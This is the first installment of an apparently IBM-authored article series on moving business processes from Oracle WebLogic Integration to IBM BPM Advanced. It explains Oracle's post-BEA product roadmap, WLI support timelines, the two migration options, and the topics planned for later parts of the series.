ajax.get(`.../react/${type}`)

If you remember, that uses ES6 string interpolation so that the URL gets written as .../react/commits, .../react/pulls, etc.
Thanks to the magic of React Router, we can use the exact same technique with the name of the repository too. We used :repo inside our route, and React Router will automatically make that available to the Detail component as this.props.params.repo. So, replace that existing ajax.get() call with this:

src/pages/Detail.js

const baseURL = '';
ajax.get(`${baseURL}/${this.props.params.repo}/${type}`)

That now does a triple interpolation: once for the :repo part of our URL, and again for the view mode that's currently selected, i.e. commits, forks and pulls. I added a third one for baseURL to avoid the line getting too long to read easily.

The final step is to modify List.js so that it points to more than one repository. Update its render() method to this:

src/pages/List.js

render() {
  return (
    <div>
      <p>Please choose a repository from the list below.</p>
      <ul>
        <li><Link to="/detail/react">React</Link></li>
        <li><Link to="/detail/react-native">React Native</Link></li>
        <li><Link to="/detail/jest">Jest</Link></li>
      </ul>
    </div>
  );
}

Now save all your work, and return to the app in your browser. You should see three links to choose from, each showing different GitHub repositories. You should also be able to use your browser's back button to return to the list and choose a different repository.
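React Router performs this :repo pattern matching for you internally. If you're curious what that matching amounts to, here's a tiny language-neutral sketch in Python (an illustration only, not React code and not how React Router is actually implemented) showing how a pattern like /detail/:repo can be turned into a regex that captures the params:

```python
import re

def compile_route(pattern):
    """Turn a path pattern like '/detail/:repo' into a compiled regex
    whose named groups capture the ':param' segments."""
    regex = re.sub(r":(\w+)", r"(?P<\1>[^/]+)", pattern)
    return re.compile("^%s$" % regex)

def match_route(pattern, path):
    """Return the captured params as a dict, or None if no match."""
    m = compile_route(pattern).match(path)
    return m.groupdict() if m else None
```

So `match_route("/detail/:repo", "/detail/react-native")` produces a params dict with repo set to "react-native", which is the same shape of information React Router hands to Detail as this.props.params.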
http://www.hackingwithreact.com/read/1/24/making-custom-urls-with-react-router-params
We're going to make a small change to the way our routes list is stored, then it's time for you to take on another task. First things first: we're storing our list of routes inside index.js, which is fine when you're just getting started but sooner or later needs to be put somewhere else to make your app easier to maintain. Well, that time is now, so create a new file called routes.js in your src directory where index.js is.

We're going to move most of the routing code out from index.js and in to routes.js so that we have a clear separation of concerns. This also means splitting up the import lines: routes.js needs to know all our app's imports, whereas index.js doesn't. Here's the new code for routes.js:

src/routes.js

import React from 'react';
import { Route, IndexRoute } from 'react-router';
import App from './pages/App';
import List from './pages/List';
import Detail from './pages/Detail';

const routes = (
  <Route path="/" component={ App }>
    <IndexRoute component={ List } />
    <Route path="detail/:repo" component={ Detail } />
  </Route>
);

export default routes;

That imports only what it needs, then creates a constant containing the route configuration for our app, and exports that constant so that others can use it. What remains in index.js is the basic router configuration and the main call to ReactDOM.render(). Over time, as your application grows, you'll probably add more to this file, but trust me on this: you'll definitely fare better if you keep your route configuration out of your main index.js file.
Here's the new code for index.js:

src/index.js

import React from 'react';
import ReactDOM from 'react-dom';
import { Router, useRouterHistory } from 'react-router';
import { createHashHistory } from 'history';
import routes from './routes';

const appHistory = useRouterHistory(createHashHistory)({ queryKey: false });

ReactDOM.render(
  <Router history={appHistory} onUpdate={() => window.scrollTo(0, 0)}>
    {routes}
  </Router>,
  document.getElementById('app')
);

With that little clean up complete, it's time for your first major task!
http://www.hackingwithreact.com/read/1/26/cleaning-up-our-routes-and-preparing-for-the-next-step
The whole resolution process may seem awfully convoluted and cumbersome to someone accustomed to simple searches through the host table. Actually, though, it's usually quite fast. One of the features that speeds it up considerably is caching. A name server processing a recursive query may have to send out quite a few queries to find an answer. However, it discovers a lot of information about the domain namespace as it does so. Each time it's referred to another list of name servers, it learns that those name servers are authoritative for some zone, and it learns the addresses of those servers. At the end of the resolution process, when it finally finds the data the original querier sought, it can store that data for future reference, too. The Microsoft DNS Server even implements negative caching: if a name server responds to a query with an answer that says the domain name or data type in the query doesn't exist, the local name server will also temporarily cache that information. Name servers cache all this data to help speed up successive queries. The next time a resolver queries the name server for data about a domain name the name server knows something about, the process is shortened quite a bit. The name server may have cached the answer, positive or negative, in which case it simply returns the answer to the resolver. Even if it doesn't have the answer cached, it may have learned the identities of the name servers that are authoritative for the zone the domain name is in and be able to query them directly. For example, say our name server has already looked up the address of eecs.berkeley.edu. In the process, it cached the names and addresses of the eecs.berkeley.edu and berkeley.edu name servers (plus eecs.berkeley.edu's IP address). Now if a resolver were to query our name server for the address of baobab.cs.berkeley.edu, our name server could skip querying the root name servers. 
Recognizing that berkeley.edu is the closest ancestor of baobab.cs.berkeley.edu that it knows about, our name server would start by querying a berkeley.edu name server, as shown in Figure 2-16. On the other hand, if our name server discovered that there was no address for eecs.berkeley.edu, the next time it received a query for the address, it could simply respond appropriately from its cache. In addition to speeding up resolution, caching obviates a name server's need to query the root name servers to answer any queries it can't answer locally. This means it's not as dependent on the roots, and the roots won't suffer as much from all its queries. Name servers can't cache data forever, of course. If they did, changes to that data on the authoritative name servers would never reach the rest of the network; remote name servers would just continue to use cached data. Consequently, the administrator of the zone that contains the data decides on a time to live (TTL) for the data. The time to live is the amount of time that any name server is allowed to cache the data. After the time to live expires, the name server must discard the cached data and get new data from the authoritative name servers. This also applies to negatively cached data: a name server must time out a negative answer after a period in case new data has been added on the authoritative name servers. Deciding on a time to live for your data is essentially deciding on a trade-off between performance and consistency. A small TTL will help ensure that data in your zones is consistent across the network, because remote name servers will time it out more quickly and be forced to query your authoritative name servers more often for new data. On the other hand, this will increase the load on your name servers and lengthen the average resolution time for information in your zones. A large TTL reduces the average time it takes to resolve information in your zones because the data can be cached longer. 
The drawback is that your information will be inconsistent longer if you make changes to the data on your name servers. But enough of this theory; I'll bet you're antsy to get on with things. You have some homework to do before you can set up your zones and your name servers, though, and we'll assign it in the next chapter.
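The two mechanisms described in this section, falling back to the closest known ancestor zone and expiring cached data after its TTL, can be sketched in a few lines of Python. This is an illustration of the concepts only, not real resolver code, and the record values are made up:

```python
def closest_known_ancestor(name, known_zones):
    """Walk up the domain tree from 'name' until we reach a zone whose
    name servers we already have cached; fall back to the root ('.')."""
    labels = name.split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in known_zones:
            return candidate
    return "."   # nothing cached: start at the root name servers

class TTLCache:
    """A minimal TTL-bound cache; the clock is injectable for testing."""
    def __init__(self, clock):
        self.clock = clock
        self.store = {}

    def put(self, key, value, ttl):
        self.store[key] = (value, self.clock() + ttl)

    def get(self, key):
        entry = self.store.get(key)
        if entry is None:
            return None
        value, expires = entry
        if self.clock() >= expires:
            del self.store[key]   # data timed out; must re-query
            return None
        return value
```

With berkeley.edu's name servers cached, a lookup for baobab.cs.berkeley.edu starts at berkeley.edu rather than the root, just as in the example above; once a record's TTL elapses, get() returns nothing and the resolver must ask the authoritative servers again.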
http://etutorials.org/Server+Administration/dns+windows+server/Chapter+2.+How+Does+DNS+Work/2.7+Caching/
1. Drag any plugin on the grid. 2. On the 'createClass' config, type a class that includes the namespace (e.g. MyApp.CustomGridPlugin). 3. It throws an error saying 'createClass: property must begin with...'

We are having the same issue with the error when using a dot (".") in the createClass config. Is this a bug?

Hello. That was our first option, but if we build the modules individually we would get redundant classes. I'm not sure how it affects our application, but that would definitely add bytes. Currently, we are creating a project that has 50 modules. We are loading each module when the login form shows in the background using Ext.require to make our application responsive, or in order to...

Is there a possible workaround for this?

REQUIRED INFORMATION
Ext version tested: Ext 4.2.1
Browser versions tested against: Any
Description:

Yes I did. For more information about my problem please see this post.

Is there an event that I could use to identify that all elements have been rendered on the DOM? I want to render my viewport after the other elements to make sure that it would lay out correctly and...

I've inspected the DOM and found out that you're right. :( Even your documentation has an issue with that. Why was it behaving correctly on Firefox? Can we have a workaround? :)

Hello, I've created a custom plugin which extends from AbstractPlugin but it seems it is not initializing. Here's some info about the plugin:
- It was created in Architect.
- The plugin was based...

Hi Aaron Conran, I would like to know if there is an update on how we can add a custom column in the grid. My suggestion is to allow the xtype to be changed by putting the xtype property in the object...

Hi, the code below didn't work. I wonder why it didn't trigger the metachange?
Can someone help me see what my mistake is?

readRecords: function(datastr) {
    var data = {};
    ...

Hi, when I use this kind of code, it works correctly:

Ext.define('Ext.ux.data.reader.DynamicReader', {
    extend: 'Ext.data.reader.Json',
    alias: 'reader.dynamicReader',
    ...
https://www.sencha.com/forum/search.php?s=4b95cc6a2cf747e2792b247f36fbe7d0&searchid=19245587
CC-MAIN-2017-22
en
refinedweb
I am using matplotlib to make scatter plots. Each point on the scatter plot is associated with a named object. I would like to be able to see the name of an object when I hover my cursor over the point on the scatter plot associated with that object. In particular, it would be nice to be able to quickly see the names of the points that are outliers. The closest thing I have been able to find while searching here is the annotate command, but that appears to create a fixed label on the plot. Unfortunately, with the number of points that I have, the scatter plot would be unreadable if I labeled each point. Does anyone know of a way to create labels that only appear when the cursor hovers in the vicinity of that point?

From:

from matplotlib.pyplot import figure, show
import numpy as npy
from numpy.random import rand
...
show()
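One way to get hover-only labels is to keep a single hidden annotation and show it from a motion_notify_event handler. The sketch below is a minimal, self-contained illustration of that idea (the point names and sizes are invented for the example; the headless Agg backend is selected only so the snippet runs anywhere):

```python
import matplotlib
matplotlib.use("Agg")  # headless backend so the sketch runs without a display
import matplotlib.pyplot as plt
import numpy as np

names = ["point-%d" % i for i in range(20)]  # hypothetical object names
x, y = np.random.rand(2, 20)

fig, ax = plt.subplots()
sc = ax.scatter(x, y)

# One reusable annotation, hidden until the cursor is near a point.
annot = ax.annotate("", xy=(0, 0), xytext=(10, 10),
                    textcoords="offset points",
                    bbox=dict(boxstyle="round", fc="w"))
annot.set_visible(False)

def update_annot(ind):
    """Move the annotation to the first hovered point and show its name."""
    i = ind["ind"][0]
    annot.xy = (x[i], y[i])
    annot.set_text(names[i])

def on_hover(event):
    # contains() tells us whether the mouse event hit any scatter point,
    # and which point indices were hit.
    if event.inaxes == ax:
        contains, ind = sc.contains(event)
        if contains:
            update_annot(ind)
            annot.set_visible(True)
        else:
            annot.set_visible(False)
        fig.canvas.draw_idle()

fig.canvas.mpl_connect("motion_notify_event", on_hover)
# plt.show()  # uncomment in an interactive session
```

With an interactive backend, moving the cursor over a point pops up its name and moving away hides it again.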
https://codedump.io/share/nSiVG61nLRG8/1/possible-to-make-labels-appear-when-hovering-over-a-point-in-matplotlib
CC-MAIN-2017-22
en
refinedweb
SP_signal()

#include <sicstus/sicstus.h>
typedef void SP_SigFun (int sig, void *user_data);
SP_SigFun SP_signal(int sig, SP_SigFun fun, void *user_data);

Installs a function fun as a handler for the signal sig. It will be called with sig and user_data as arguments.

sig
The signal.
fun
The function.
user_data
An extra, user defined value passed to the function.

Returns SP_SIG_ERR if an error occurs. On success, some value different from SP_SIG_ERR.

The handler may only call other (non-SICStus) C code and SP_event(). Note that fun will be called in the main thread.

If fun is one of the special constants SP_SIG_IGN or SP_SIG_DFL, then one of two things happens: if a handler for sig has already been installed with SP_signal(), then the SICStus OS-level signal handler is removed and replaced with, respectively, SIG_IGN or SIG_DFL.

Note that SP_signal() is not suitable for installing signal handlers for synchronous signals like SIGSEGV.

See also: SP_event(), Signal Handling.
https://sicstus.sics.se/sicstus/docs/latest/html/sicstus.html/cpg_002dref_002dSP_005fsignal.html
CC-MAIN-2017-22
en
refinedweb
Posted 25 Mar 2009

Ok, I know the subject doesn't make sense, but I am at the point of ripping my hair out over this. I have a struct which contains other structs (also tagged serializable), shown below. I am heavily using Telerik controls in this app, and as the user follows this tab-driven wizard, information from each tab is added to the TestConfig object in ViewState. This works flawlessly, until... you let the browser sit for 4 or so minutes. If at any point in time you sit on a particular tab and wait the requisite 240+ seconds, when the user clicks next, the debugger throws an InvalidCastException. Here is the interesting part. The cast is a simple return of the object from ViewState (below). The object in ViewState no longer thinks it is a TestConfig object. It will allow me to cast it as an object, as it rightfully should, and I can even drill down into the object within VS2008 and see all of the data is still there. Somehow it is losing its type and I cannot for the life of me figure it out. I am at the point of either moving to a database solution or, if it doesn't make sense to do that, hidden controls, but I would really like to just resolve this the right way. Anyone have any thoughts?
Structs:

[Serializable]
public struct TestConfig
{
    public GridData oTestType;
    public GridData oArchitecture;
    public GridData oBuild;
    public GridData oBuildType;
    public List<GridData> gloLanguages;
    public List<GridData> gloOperatingSystems;
    public List<GridData> gloFamilies;
    public List<TestDriverData> gloTestDriverData;
}

[Serializable]
public struct TestDriverData
{
    public string sPath;
    public string sModel;
    public string sModelDisplayString;
    public string sPort;
    public string sPdl;
    public string sPdlDisplayString;
    public string sFamily;
}

[Serializable]
public struct GridData
{
    public string sDisplay;
    public string sData;
    public string sMisc;
}

Return code:

return (TestConfig)ViewState["m_TestConfig"];

Posted 26 Mar 2009
http://www.telerik.com/forums/odd-viewstate-timeout-issue
CC-MAIN-2017-22
en
refinedweb
This article is part 2 in a series that discusses namespace planning, load balancing principles, client connectivity, and certificate planning. Unlike previous versions of Exchange, Exchange 2013 no longer requires session affinity at the load balancing layer. To understand this statement better, and see how this impacts your designs, we need to look at how CAS2013 functions. From a protocol perspective, the following will happen:

Step 5 is the fundamental change that enables the removal of session affinity at the load balancer. For a given protocol session, CAS now maintains a 1:1 relationship with the Mailbox server hosting the user’s data. In the event that the active database copy is moved to a different Mailbox server, CAS closes the sessions to the previous server and establishes sessions to the new server. This means that all sessions, regardless of their origination point (i.e., CAS members in the load balanced array), end up at the same place: the Mailbox server hosting the active database copy. This is vastly different from previous releases – in Exchange 2010, if all requests from a specific client did not go to the same endpoint, the user experience was negatively affected.

The protocol used in step 6 depends on the protocol used to connect to CAS. If the client leverages the HTTP protocol, then the protocol used between the Client Access server and Mailbox server is HTTP (secured via SSL using a self-signed certificate). If the protocol leveraged by the client is IMAP or POP, then the protocol used between the Client Access server and Mailbox server is IMAP or POP.

Telephony requests are unique, however. Instead of proxying the request at step 6, CAS will redirect the request to the Mailbox server hosting the active copy of the user’s database, as the telephony devices support redirection and need to establish their SIP and RTP sessions directly with the Unified Messaging components on the Mailbox server.
http://blogs.technet.com/b/omers/archive/2014/03/06/load-balancing-in-exchange-2013.aspx
CC-MAIN-2015-06
en
refinedweb
iPcCommandInput Struct Reference

Input property class. More...

#include <propclass/input.h>

- RemoveBind: parameters 'trigger' (string) and 'command' (string).
- RemoveAllBinds.
- LoadConfig: parameters 'prefix' (string).
- SaveConfig: parameters 'prefix' (string).

This property class can send out the following messages to the behaviour:

- (-1/1 is default).
- cooked (bool, read/write): use cooked mode instead of raw (default is raw).
- sendtrigger (bool, read/write): send out the trigger name in the message to the behaviour. Default is false.

Definition at line 59 of file input.h.

Member Function Documentation

Activates the input to get commands.

Binds a trigger to a command. The trigger name can be equal to 'key', in which case all keys will be bound.

Convert a coordinate from a value between -1 and 1 to screen space.

Returns the command bound to a key.

Get cooked or raw mode.

Is send trigger enabled or disabled?

Loads from a config file, binding triggers (for example, keys) to commands.

Deletes all binds. Deletes a bind; if the trigger name is 0, deletes all binds to the command.

Generated by doxygen 1.4.7
http://crystalspace3d.org/cel/docs/online/api-1.0/structiPcCommandInput.html
CC-MAIN-2015-06
en
refinedweb
Konstantin Shvachko commented on HADOOP-5795:
---------------------------------------------

Currently {{getBlockLocations(src, offset, length)}} returns a class called {{LocatedBlocks}}, which contains a list of {{LocatedBlock}} belonging to the file.
{code}
public class LocatedBlocks implements Writable {
  private long fileLength;
  private List<LocatedBlock> blocks; // array of blocks with prioritized locations
}
{code}
The question is whether we should modify {{LocatedBlocks}}, which would include the map proposed by Doug and extend the semantics of {{getBlockLocations()}} to handle directories, or should we introduce a new method (rpc) {{getBlockLocations(srcDir)}} returning {{LocatedBlockMap}}. Is there a reason to keep the current per-file {{getBlockLocations()}} if we had a more generic method?

> Add a bulk FIleSystem.getFileBlockLocations
> -------------------------------------------
>
> Key: HADOOP-5795
> URL:
> Project: Hadoop Core
> Issue Type: New Feature
> Components: dfs
> Affects Versions: 0.20.0
> Reporter: Arun C Murthy
> Fix For: 0.21.0
http://mail-archives.apache.org/mod_mbox/hadoop-common-dev/200905.mbox/%3C2141423149.1241806545682.JavaMail.jira@brutus%3E
CC-MAIN-2015-06
en
refinedweb
27 January 2009 22:21 [Source: ICIS news]

TORONTO (ICIS news)--Kuwait’s parliament voted on Tuesday to set up a panel to investigate the K-Dow petrochemicals joint-venture deal between Dow Chemical and the country’s Petrochemicals Industries Co (PIC) that was later cancelled, regional media reported on Tuesday. The panel would investigate allegations of profiteering and other irregularities by officials involved in the deal, Kuwait's Al Watan newspaper and other media reported. Under the deal, Dow would have received $7.5bn from PIC. Kuwait cancelled the deal in late December, citing unfavourable economic conditions and the global financial crisis.

A media official at Dow’s headquarters in

Dow chief executive Andrew Liveris, in an interview with

He confirmed that Dow had taken legal steps against

Liveris also said that, should the deal with PIC close after all or if another partner came forward, Dow for its part would be able to close its acquisition of

In the current tough financial market environment, however, it would be “an economic disaster” for both companies to put Dow Chemical and Rohm and Haas together, Liveris said. He expressed his hope that the deal may be concluded at a later but unspecified date. Rohm and Haas said on Monday it had taken legal action against Dow for failing to close the deal.
http://www.icis.com/Articles/2009/01/27/9188128/kuwait-parliament-votes-to-probe-dow-pic-deal-reports.html
CC-MAIN-2015-06
en
refinedweb
At the Forge - Ruby on Rails

Now that we know how to see the default message, let's move toward a “Hello, world” program. In Rails, there are two basic ways to do this. We can create a controller that returns HTML to the user's browser, or we can create a view that does the same. Let's try it both ways, so that we can better understand the relationship between controllers and views. If all we want to do is include a simple, static HTML document, we can do so in the public directory. In other words, the file blog/public/foo.html is available under WEBrick—started by executing blog/script/server—at the URL /foo.html. Of course, we're interested in doing something a bit more interesting than serving static HTML documents. We can do that by creating a controller class and then defining a method within that class to produce a basic “Hello, world” message. Admittedly, this is a violation of the MVC separation that Rails tries to enforce, but as a simple indication of how things work, it seems like a good next step. To generate a new controller class named MyBlog, we enter the blog directory and type:

ruby script/generate controller MyBlog

Each time we want to create a new component in our Rails application, we call upon script/generate to create a skeleton. We then can modify that skeleton to suit our specific needs. As always, Rails tells us what it is doing as it creates the files and directories:

exists app/controllers/
exists app/helpers/
create app/views/my_blog
exists test/functional/
create app/controllers/my_blog_controller.rb
create test/functional/my_blog_controller_test.rb
create app/helpers/my_blog_helper.rb

Also notice how our controller class name, MyBlog, has been turned into various Ruby filenames, such as app/views/my_blog and app/helpers/my_blog_helper.rb. Create several more controller classes, and you should see that all of the names, like FooBar, are implemented in files with names like foo_bar.
This is part of the Rails convention of keeping names consistent. This consistency makes it possible for Rails to take care of many items almost magically, especially—as we will see next month—when it comes to databases. The controller that interests us is my_blog_controller.rb. If you open it up in an editor, you should see that it consists of two lines:

class MyBlogController < ApplicationController
end

In other words, this file defines MyBlogController, a class that inherits from the ApplicationController class. As it stands, the definition is empty, which means that we have neither overridden any methods from the parent class nor written any new methods of our own. Let's change that, using the built-in render_text method to produce some output:

class MyBlogController < ApplicationController
  def hello_world
    render_text "Hello, world"
  end
end

After adding this method definition, we can see its results by going to. Notice how the URL has changed: static items in the public directory, such as our file foo.html, sit just beneath the root URL, /. By contrast, our method hello_world is accessed by name, under the controller class that we generated. Also notice that we did not need to restart Rails in order to create and test this definition. As soon as a method is created or changed, it immediately is noticed and integrated into the current Rails system. If we define an index method for our controller class, we can indicate what should be displayed by default:

class MyBlogController < ApplicationController
  def hello_world
    render_text "Hello, world"
  end

  def index
    render_text "I am the index!"
  end
end

Of course, it's not that exciting to be able to produce static text.
Therefore, let's modify our index method such that it uses Ruby's built-in Time object to show the current date and time:

def index
  render_text "The time is now " + Time.now.to_s + "\n"
end

And voilà! As soon as we save this modification to disk, the default URL (, on my computer) displays the time and date at which the request was made, as opposed to a never-changing “Hello, world” message. Let's conclude this introduction to Rails by separating the controller from its view once again. In other words, we want to have the controller handle the logic and the view handle the HTML output. Once again, Rails allows us to do this easily by taking advantage of its naming conventions. For example, let us modify our index method again, this time removing its entire body:

def index
end

This might seem strange at first glance. It tells Rails that the MyBlog controller class has an index method. But it doesn't generate any output. If you attempt to retrieve the same URL as before, Rails produces an error message indicating that it could not find an appropriate template. Because the template is a view, we can define it inside of the blog/app/views directory of our application. And because we are defining the index view for the MyBlog class, we modify the index.rhtml file in the my_blog subdirectory of views. Notice how Rails turns ThisName into this_name when it comes to directories. Doing so saves users from having to think about capitalization in URLs, while staying consistent with traditional Ruby class naming conventions. .rhtml files are a Ruby version of the same kind of template that you might have seen before. It acts similarly to ASP and JSP syntax, with <% %> blocks containing code and <%= %> blocks containing expressions that should be interpolated into the template. However, nothing stops us from creating an .rhtml template that actually is static:

<html>
<head>
<title>Hello, again!</title>
</head>
<body>
<p>Hello, again!</p>
</body>
</html>

Consider what happens now if you attempt to load MyBlog in your browser. The controller class MyBlog is handed the request. Because no method was named explicitly, the index method is invoked. And because index doesn't produce any output, the my_blog/index.rhtml template is returned to the user. Finally, let's take advantage of our template's dynamic properties to set a value in the controller and pass that along to the template. We modify our index method to read:

def index
  @now = Time.now.to_s
end

Notice how we have used an @ character at the beginning of the variable @now. I found this to be a little confusing at first, as @ normally is used as a prefix for instance variables in Ruby. But it soon becomes fairly natural and logical after some time. Finally, we modify our template such that it incorporates the string value contained in @now:

<html>
<head>
<title>Hello, world!</title>
</head>
<body>
<p>Hello, world!</p>
<p>It is now <%= @now %>.</p>
</body>
</html>

Once again, you can retrieve the page even without restarting Ruby. You should see the date and time as kept on the server, updated each time you refresh the page!
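The <%= %> interpolation that .rhtml templates use comes from Ruby's standard ERB library, so you can see the same mechanism working outside of Rails. Here is a minimal, framework-free sketch (the variable names are illustrative, not from the article):

```ruby
require 'erb'

# A template using the same <%= %> interpolation syntax as .rhtml files.
template = <<~RHTML
  <p>Hello, world!</p>
  <p>It is now <%= now %>.</p>
RHTML

now = Time.now.to_s                      # the value a controller would set
html = ERB.new(template).result(binding) # interpolate into the template
puts html
```

Running this prints the template with the current time substituted where the <%= %> block appears, which is essentially what Rails does with @now behind the scenes.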
http://www.linuxjournal.com/article/8433?page=0,1&quicktabs_1=2
CC-MAIN-2015-06
en
refinedweb
In this document, we will quickly help you finish a simple demo with Spire.XLS using Visual Studio. As usual, it’s a HelloWorld demo. Before you get started, please make sure Spire.XLS and Visual Studio (2008 or later) are installed on your computer.

1. In Visual Studio, click File, New, and then Project. If you want to create a C# project, select Visual C#, Windows, choose Windows Forms Application, and name the project HelloWorld. Click OK. If you want to create a Visual Basic project, select Visual Basic, Windows Forms Application, and name the project HelloWorld. Click OK.

2. In Solution Explorer, right-click the project HelloWorld and click Add Reference. In the Browse tab, find the folder in which you installed Spire.XLS; the default is "C:\Program Files\e-iceblue\Spire.XLS". Double-click the folder Bin. If the target framework of the project HelloWorld
- is .NET 2.0, double-click folder NET2.0
- is .NET 3.5, double-click folder NET3.5
- is .NET 4.0, double-click folder NET4.0
Select the assembly Spire.XLS.dll and click OK to add it to the project.

3. In Solution Explorer, double-click the file Form1.cs/Form1.vb to open the form design view, add a button to the form, change its name to 'btnRun', and change its text to 'Run'.

4. Double-click the button 'Run', and you will see the code view; the following method has been added automatically:

private void btnRun_Click(object sender, EventArgs e)

Private Sub btnRun_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnRun.Click

5. Add the following code to the top of the file:

using Spire.Xls;

Imports Spire.Xls

6. Add the following code to the method btnRun_Click:

//Creates workbook
Workbook workbook = new Workbook();
//Gets first worksheet
Worksheet sheet = workbook.Worksheets[0];
//Writes hello world to A1
sheet.Range["A1"].Text = "Hello,World!";
//Save workbook to disk
workbook.SaveToFile("Sample.xls");
try
{
    System.Diagnostics.Process.Start(workbook.FileName);
}
catch { }

'Creates workbook
Dim workbook As Workbook = New Workbook()
'Gets first worksheet
Dim sheet As Worksheet = workbook.Worksheets(0)
'Writes hello world to A1
sheet.Range("A1").Text = "Hello,World!"
'Save workbook to disk
workbook.SaveToFile("Sample.xls")
Try
    System.Diagnostics.Process.Start(workbook.FileName)
Catch
End Try

7. In Solution Explorer, right-click the project HelloWorld and click Debug, then Start new instance. You will see the opened window Form1; click the button 'Run', and an Excel document will be created, edited and opened. The string "Hello, World" is filled in the cell A1.
http://www.e-iceblue.com/Knowledgebase/Spire.XLS/Getting-started/Spire.XLS-Quick-Start.html
CC-MAIN-2015-06
en
refinedweb
The above problem can be solved using a web service. Functionality which is to be used by various applications will now be exposed as a web service. Since a web service is based on the principle of separation between interface and implementation, the implementation part of the web service will make use of the core Ex API to achieve the required functionality. Since a web service provides transparency with respect to programming language, applications written in various programming languages can access the web service without any hindrance. Hence, using a web service serves as the best solution in this scenario.

JAX WS

package com.questpond.service;

import javax.jws.WebMethod;
import javax.jws.WebService;
import javax.jws.soap.SOAPBinding;
import javax.jws.soap.SOAPBinding.Style;

@WebService
@SOAPBinding(style = Style.RPC)
public interface DocumentInt {
    @WebMethod
    public String upload(byte data[]);
}

Step 3: Create a DocumentImpl class implementing DocumentInt and give a body to upload. The function takes a byte array and converts it to a file at location "D:/eclipse/Example.pdf". MTOM is used to support optimization while transmitting binary data.

DocumentImpl

package com.questpond.service;

import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import javax.jws.WebService;
import javax.xml.ws.soap.MTOM;

@MTOM
@WebService(endpointInterface = "com.questpond.service.DocumentInt")
public class DocumentImpl implements DocumentInt {
    @Override
    public String upload(byte data[]) {
        OutputStream fos;
        try {
            fos = new FileOutputStream(new File("D://eclipse//Example.pdf"));
            fos.write(data);
            fos.flush();
            fos.close();
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
        return "success";
    }
}

Step 4: Create a DocumentPublisher class which will publish the created web service.
Put the following code inside the same:

DocumentPublisher

package com.questpond.service;

import javax.xml.ws.Endpoint;

public class DocumentPublisher {
    public static void main(String[] args) {
        Endpoint.publish("", new DocumentImpl());
        System.out.println("Server is published!");
    }
}

Step 5: Execute the publisher class so that the web service is exposed. Confirm the same by putting the following URL in a web browser to get the exposed WSDL file. A snippet of the same is shown:

Step 6: Create a client for the web service. Let’s name the class Main. The Main class will be responsible for invoking the web service, and since the parameter to the upload function is a byte array which contains file data, the client will convert the file to a byte array and pass it to the upload function, which will convert the byte array back to a file. Put the following code in the main function of the Main class:

public static void main(String[] args) {
    URL url;
    byte[] bytes = new byte[5000];
    try {
        url = new URL("");
        QName qname = new QName("", "DocumentImplService");
        Service service = Service.create(url, qname);
        DocumentInt server = service.getPort(DocumentInt.class);
        File file = new File("E:/Documents/view_pdf.pdf");
        bytes = new byte[(int) file.length()];
        try {
            FileInputStream fileInputStream = new FileInputStream(file);
            // Note: read() may fill only part of the buffer, so loop
            // until the whole file has been read.
            int offset = 0;
            while (offset < bytes.length) {
                int count = fileInputStream.read(bytes, offset, bytes.length - offset);
                if (count < 0) {
                    break;
                }
                offset += count;
            }
            fileInputStream.close();
        } catch (FileNotFoundException e) {
            System.out.println("File Not Found.");
            e.printStackTrace();
        } catch (IOException e1) {
            System.out.println("Error Reading The File.");
            e1.printStackTrace();
        }
        server.upload(bytes);
    } catch (Exception e) {
        e.printStackTrace();
    }
}

The above function reads a file from E:/Documents/view_pdf.pdf and converts the file to a byte array. This byte array is then used to invoke the upload function. On executing the client, we will get a file created in the location which we specified in the upload function.
http://www.codeproject.com/Articles/216081/Solving-real-world-problems-using-Webservice
CC-MAIN-2015-06
en
refinedweb
Introduction

Oracle unveiled its roadmap for the products from the BEA acquisition back in July 2008. During the webcast, Oracle Senior VP Thomas Kurian explained that Oracle has divided BEA’s products into three groups (strategic [1], continue and converge [2], and maintenance [3]). He then assigned each of the BEA products to one of these groups. WebLogic Integration (WLI) was assigned to the "continue and converge" group; it was no longer listed as a strategic product. This means that incremental extensions will be made to WLI 10gR3 and it will be converged with the Oracle BPEL Process Manager. In fact, extended support has already ended for many of the earlier WLI releases. For more information, refer to Oracle Information Driven Support: Lifetime Support Policy.

Because WLI is no longer a strategic product at Oracle, all WLI customers will eventually be forced to migrate their business processes and applications from WLI to an alternative platform, such as Oracle BPEL Process Manager or IBM BPM Advanced. If you are one of those Oracle customers lucky enough to be running on WLI 10gR3, you can defer that decision for a few years, because extended support for 10gR3 doesn't end until Jan 2017. But if you are like most Oracle customers and are running your business processes on earlier versions of WLI, you will need to make a decision soon. In making such a decision, there are two options to consider. Specifically, you can:

- Migrate to WLI 10gR3 now and migrate to an alternative platform in a few years.
- Migrate to an alternative platform now and avoid the cost of migrating to 10gR3.

If you decide to migrate to an alternative platform, one option is Oracle BPEL Process Manager, which provides common infrastructure services to create, deploy, and manage BPEL business processes. Oracle has tooling to assist in the migration of WLI business processes and applications.
However, another strategic replacement product for WLI is IBM BPM Advanced, which is also a fully functional BPEL solution with tools to assist in the migration from WLI, as illustrated in the comparison below.

Notes:

1.
2.
3. Maintenance — These products were already declared by BEA prior to the acquisition to be at the ends of their lives. Oracle will honor BEA’s maintenance contracts on these products by supporting them for at least five years.

Table 1. Feature comparison of IBM BPM Advanced V8 and Oracle Weblogic Integration 10gR3

Series overview

This series of articles describes the overall process and supporting tools for exporting BPEL and supporting artifacts from WLI to IBM BPM Advanced. This tool-assisted approach enables you to produce a complete replica of your WLI application running on the IBM BPM Advanced platform. You can perform manual editing for optimum use of the new features provided by the platform. To obtain the migration tools described in this series, please contact the authors directly.

The series does not present a feature by feature comparison of Oracle BPEL Process Manager and IBM BPM Advanced. Contact your IBM sales representative for such a comparison. For this series, it is sufficient to say that IBM BPM Advanced is a superset of the features and functions in WLI, as illustrated in Table 2, and is therefore a viable alternative to WLI.

The articles in this series are as follows:

- Part 1: "Introduction" describes the tools and techniques that have been successfully used to migrate WLI business processes and associated artifacts to BPM. This article covers the following:
  - Artifacts describes WLI artifacts that make up the business processes.
  - Tooling describes the tools that can be used to migrate these artifacts.
  - The migration process describes the high-level process of exporting and migrating these artifacts.
- Part 2: "Data Transformations" describes the different transformations that may be required to reuse business logic that is encapsulated inside the WLI artifacts.
